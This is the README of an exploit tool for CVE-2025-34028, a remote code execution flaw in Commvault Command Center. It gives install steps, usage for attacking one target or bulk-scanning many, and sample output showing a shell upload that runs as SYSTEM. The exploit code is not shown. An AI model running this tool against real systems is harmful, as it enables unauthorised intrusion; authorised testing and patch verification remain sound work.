CVE-2025-34028 - Commvault Command Center Remote Code Execution

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

Features

  • Single target or bulk scanning capability
  • Automatic Commvault instance verification
  • Detailed output with system user information
  • Random path generation for each execution
  • Clean summary table of vulnerable hosts
  • Comprehensive error handling

Installation

git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt

Requirements

  • Python 3.6+
  • Required packages:
    • requests
    • tabulate

Install requirements with:

pip install requests tabulate

Usage

usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line

Examples

Test a single target:

python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000

Scan multiple targets from a file:

python CVE-2025-34028-Commvault.py -f targets.txt

Target File Format

The targets file should contain one target per line in the format:

https://host:port
http://ip

Example targets.txt:

https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443

Output

The script provides:

  • Real-time progress with status for each target
  • Detailed output for vulnerable hosts
  • Summary table of all tested hosts
  • Clear identification of successful exploitations

Sample output:

CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+---------------------------------+---------------------+---------------------+
| Index   | URL                             | Status              | System User         |
+---------+---------------------------------+---------------------+---------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+---------------------------------+---------------------+---------------------+

Disclaimer

This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

License

MIT License - See LICENSE file for details